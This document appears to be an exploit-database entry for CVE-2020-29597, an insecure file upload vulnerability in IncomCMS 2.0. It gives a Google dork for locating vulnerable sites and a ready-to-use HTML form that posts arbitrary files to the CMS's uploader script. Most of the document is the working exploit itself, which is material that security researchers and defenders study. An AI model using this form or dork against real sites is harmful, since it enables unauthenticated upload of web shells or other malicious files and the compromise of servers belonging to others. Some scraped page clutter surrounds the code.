22 lines
No EOL
617 B
HTML
22 lines
No EOL
617 B
HTML
# Exploit Title: IncomCMS 2.0 - Insecure File Upload
|
|
# Google Dork: intext:"Incom CMS 2.0"
|
|
# Date: 07.12.2020
|
|
# Exploit Author: MoeAlBarbari
|
|
# Vendor Homepage: https://www.incomcms.com/
|
|
# Version: 2.0
|
|
# Tested on: BackBox linux
|
|
# CVE: CVE-2020-29597
|
|
|
|
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<title>Upload your files</title>
|
|
</head>
|
|
<body>
|
|
<form enctype="multipart/form-data" action="http://www.example.com/incom/modules/uploader/showcase/script.php" method="POST">
|
|
<p>Upload your file</p>
|
|
<input type="file" name="Filedata"></input><br />
|
|
<input type="submit" value="Upload"></input>
|
|
</form>
|
|
</body>
|
|
</html> |